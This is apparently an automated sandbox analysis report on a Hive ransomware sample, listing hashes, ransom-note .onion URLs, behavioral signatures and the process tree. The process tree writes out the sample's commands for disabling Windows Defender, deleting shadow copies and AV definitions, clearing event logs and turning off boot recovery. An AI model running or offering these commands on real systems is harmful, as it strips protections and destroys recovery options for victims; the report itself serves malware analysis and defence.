Analysis
- max time kernel: 190s
- max time network: 125s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 16:49
Static task: static1
Behavioral task: behavioral1
- Sample: d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
- Resource: win10-en-20211208
General
- Target: d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
- Size: 2.8MB
- MD5: a40c341cc0818d5ccdcb08ccac1a7559
- SHA1: 1d841ebf12a24b92e2de0c22d995385274500a38
- SHA256: d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac
- SHA512: ed9d222fa9f919804ecce7f9b3cbd428b2420ce174eab97ab4aae2426fc47b54a3ba3d5c8a7436bbf3cd800852740ab9cc2bef7deefa3cfda223f655e6349b75
Malware Config
Extracted
- Path: C:\Program Files\7-Zip\iotb_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  - http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  - http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 852)
- Hive
  A ransomware written in Golang first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 1924), bcdedit.exe (PID 1464)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1028)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 852), powershell.exe (PID 2112), d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe (PID 1308)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe (PID 1308)
  Command line: "C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 588)
    Command line: net.exe stop "NetMsmqActivator" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 544)
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - C:\Windows\system32\net.exe (PID 1116)
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1072)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\system32\net.exe (PID 1628)
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1688)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  - C:\Windows\system32\net.exe (PID 1768)
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 396)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\system32\net.exe (PID 1108)
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1100)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\system32\net.exe (PID 1056)
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1808)
      Command line: C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\system32\net.exe (PID 1360)
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1368)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\system32\net.exe (PID 1196)
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1332)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\system32\sc.exe (PID 1204)
    Command line: sc.exe config "NetMsmqActivator" start= disabled
  - C:\Windows\system32\sc.exe (PID 1476)
    Command line: sc.exe config "SamSs" start= disabled
  - C:\Windows\system32\sc.exe (PID 2032)
    Command line: sc.exe config "SDRSVC" start= disabled
  - C:\Windows\system32\sc.exe (PID 556)
    Command line: sc.exe config "SstpSvc" start= disabled
  - C:\Windows\system32\sc.exe (PID 1836)
    Command line: sc.exe config "UI0Detect" start= disabled
  - C:\Windows\system32\sc.exe (PID 680)
    Command line: sc.exe config "VSS" start= disabled
  - C:\Windows\system32\sc.exe (PID 912)
    Command line: sc.exe config "wbengine" start= disabled
  - C:\Windows\system32\sc.exe (PID 1748)
    Command line: sc.exe config "WebClient" start= disabled
  - C:\Windows\system32\reg.exe (PID 1596)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1272)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 768)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1072)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1344)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1484)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1084)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1088)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1832)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1368)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1604)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1212)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1776)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 832)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1216)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1700)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\schtasks.exe (PID 1740)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1764)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\system32\schtasks.exe (PID 544)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1676)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\system32\schtasks.exe (PID 436)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - C:\Windows\system32\reg.exe (PID 1080)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1304)
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1548)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - C:\Windows\system32\reg.exe (PID 880)
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 292)
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 928)
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1908)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1552)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1496)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1468)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1100)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
  - C:\Windows\system32\reg.exe (PID 1236)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\vssadmin.exe (PID 1028)
    Command line: vssadmin.exe delete shadows /all /quiet
    Signatures: Interacts with shadow copies
  - C:\Windows\system32\wevtutil.exe (PID 1952)
    Command line: wevtutil.exe cl system
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wevtutil.exe (PID 860)
    Command line: wevtutil.exe cl security
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wevtutil.exe (PID 1104)
    Command line: wevtutil.exe cl application
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 1712)
    Command line: wmic.exe SHADOWCOPY /nointeractive
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 1888)
    Command line: wmic.exe shadowcopy delete
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\bcdedit.exe (PID 1924)
    Command line: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\system32\bcdedit.exe (PID 1464)
    Command line: bcdedit.exe /set {default} recoveryenabled no
    Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\system32\cmd.exe (PID 1688)
    Command line: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    - C:\Program Files\Windows Defender\MpCmdRun.exe (PID 852)
      Command line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      Signatures: Deletes Windows Defender Definitions
  - C:\Windows\system32\cmd.exe (PID 568)
    Command line: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 852)
      Command line: powershell Set-MpPreference -DisableIOAVProtection $true
      Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\cmd.exe (PID 2092)
    Command line: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2112)
      Command line: powershell Set-MpPreference -DisableRealtimeMonitoring $true
      Signatures: Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 167090a23e64847bcc9891c90b399071
  SHA1: 8bf9030451446825ac778dd9f0d42e564a5166ba
  SHA256: 2f6c04e155715a2efb59427bc2a4941c622fa9d51446b925a59a34cf323bbf48
  SHA512: 529f1926c5741c272cafb437c7903e24f36fdbb0cc8ae2a0d8bdb93cd3a8be4386559f73ba2d09c18b36f3bd9e29081d782179427b7ea3cd090a6a28404c188a